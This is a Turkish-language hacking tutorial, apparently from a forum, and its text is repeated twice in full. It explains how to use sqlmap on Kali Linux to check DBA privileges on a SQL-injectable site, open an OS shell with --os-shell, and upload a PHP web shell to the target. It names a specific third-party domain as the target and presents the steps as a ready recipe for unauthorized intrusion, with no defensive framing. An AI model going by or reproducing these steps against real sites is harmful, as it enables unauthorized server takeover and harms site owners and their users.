Herkese Merhaba Arkadaşlar.
Bu işlemleri Kali Linux üzerinden uyguluyoruz zaten "Sqlmap" yüklü olarak geliyor.
İlk başta bir sql açıklı site bulduk ve bu açıklı sitemize shell sokmak istiyoruz.Öncelikle sitemizde bir sqlmap sorgusu yapıyoruz ancak farklı parametreleri kullanarak bu işlemi gerçekleştiriyoruz.
Bu sefer --dbs komutu yerine, --current-user --is-dba komutunu kullanacağız.Örnek ile gösterecek olursak;
Normalde bu kodu kullanıyorduk;
sqlmap -u "www.sqlaciklisite.com/php?id=" --dbs
Bu sefer bu kod yerine aşağıdaki kodu kullanacağız;
Kullanacağımız Kodumuz:
sqlmap -u "www.sqlaciklisite.com/php?id=" --current-user --is-dba
komutu ile başlatabiliriz. Biraz bekledikten sonra eğer aşağıdaki gibi bir kod görürseniz;
Kodumuz:
--> current user is DBA : True <--
Demektir ki shell sokmaya çok yakınsınız.Buradan sonra artık işler daha da kolaylaşmaya başlıyor;
Kodumuz:
sqlmap -u "www.sqlaciklisite.com/php?id=" --os-shell
Bu kodu yazdıktan ve sonrasında enterladıktan sonra sitenin yazılmış olduğu dili soruyor.Bu dili şu yolla bulabiliriz;
Mesela sitemiz şu
Sitemiz:
Bu siteye girelim ve .ca'dan sonra "aspx" deneyelim;
Sitemizin adresi:
NIGHT GALLERY /index.aspx
Page not found hatası aldık demekki aspx ile yazılmamış.Daha sonra "asp" deneyelim;
Sitemizin adresi:
NIGHT GALLERY /index.asp
Yine Page not found hatası aldım demekki asp ile de yazılmamış.Ancak "php" denediğimde;
Sitemizin adresi:
Ana sayfasına ulaştık yani sayfa php dili ile yazılmış.Sqlmap size şöyle
seçenekler verir;
(Sqlmap'e benzemesi açıdan bu işaretleri koydum.)
|1|ASP
|2|PHP
|3|ASPX
|4|JSP
Bu durumda sitemizin dilini yani php'yi seçmemiz gerekiyor.Hedef sitemiz dimle.org "php" diliyle yazılmış çünkü.
Enterladıktan sonra karşımıza info yani bilgi veren bir kısım gelmesi lazım,o infoların arasında bir link olacak.
İnfo da bir link verilmiştir eğer gördüyseniz.Linke gidiyoruz ve karşımıza "shell" upload edilebilen bir yer geliyor.
Artık shellimizi upload edebiliriz.Upload ettikten sonra linkte .php yada .asp yada .aspx den önceki yazan yazıyı silip shellin adını yazıp
enter tuşuna basmamız yeterlidir Örnek olarak;
Sitemizin adresi:
http://www.sqlaciklisite.com/events/...i/tmpuhvef.php
Buraya upload ediyoruz mesela, shellimizin adı webroot.php olsun
Sitemizin adresi:
http://www.sqlaciklisite.com/events/...li/webroot.php
ve Shellimiz karşımızda, gerisi size kalmış...
Bu işlemleri Kali Linux üzerinden uyguluyoruz zaten "Sqlmap" yüklü olarak geliyor.
İlk başta bir sql açıklı site bulduk ve bu açıklı sitemize shell sokmak istiyoruz.Öncelikle sitemizde bir sqlmap sorgusu yapıyoruz ancak farklı parametreleri kullanarak bu işlemi gerçekleştiriyoruz.
Bu sefer --dbs komutu yerine, --current-user --is-dba komutunu kullanacağız.Örnek ile gösterecek olursak;
Normalde bu kodu kullanıyorduk;
sqlmap -u "www.sqlaciklisite.com/php?id=" --dbs
Bu sefer bu kod yerine aşağıdaki kodu kullanacağız;
Kullanacağımız Kodumuz:
sqlmap -u "www.sqlaciklisite.com/php?id=" --current-user --is-dba
komutu ile başlatabiliriz. Biraz bekledikten sonra eğer aşağıdaki gibi bir kod görürseniz;
Kodumuz:
--> current user is DBA : True <--
Demektir ki shell sokmaya çok yakınsınız.Buradan sonra artık işler daha da kolaylaşmaya başlıyor;
Kodumuz:
sqlmap -u "www.sqlaciklisite.com/php?id=" --os-shell
Bu kodu yazdıktan ve sonrasında enterladıktan sonra sitenin yazılmış olduğu dili soruyor.Bu dili şu yolla bulabiliriz;
Mesela sitemiz şu
Sitemiz:
Bu siteye girelim ve .ca'dan sonra "aspx" deneyelim;
Sitemizin adresi:
NIGHT GALLERY /index.aspx
Page not found hatası aldık demekki aspx ile yazılmamış.Daha sonra "asp" deneyelim;
Sitemizin adresi:
NIGHT GALLERY /index.asp
Yine Page not found hatası aldım demekki asp ile de yazılmamış.Ancak "php" denediğimde;
Sitemizin adresi:
Ana sayfasına ulaştık yani sayfa php dili ile yazılmış.Sqlmap size şöyle
seçenekler verir;
(Sqlmap'e benzemesi açıdan bu işaretleri koydum.)
|1|ASP
|2|PHP
|3|ASPX
|4|JSP
Bu durumda sitemizin dilini yani php'yi seçmemiz gerekiyor.Hedef sitemiz dimle.org "php" diliyle yazılmış çünkü.
Enterladıktan sonra karşımıza info yani bilgi veren bir kısım gelmesi lazım,o infoların arasında bir link olacak.
İnfo da bir link verilmiştir eğer gördüyseniz.Linke gidiyoruz ve karşımıza "shell" upload edilebilen bir yer geliyor.
Artık shellimizi upload edebiliriz.Upload ettikten sonra linkte .php yada .asp yada .aspx den önceki yazan yazıyı silip shellin adını yazıp
enter tuşuna basmamız yeterlidir Örnek olarak;
Sitemizin adresi:
http://www.sqlaciklisite.com/events/...i/tmpuhvef.php
Buraya upload ediyoruz mesela, shellimizin adı webroot.php olsun
Sitemizin adresi:
http://www.sqlaciklisite.com/events/...li/webroot.php
ve Shellimiz karşımızda, gerisi size kalmış...
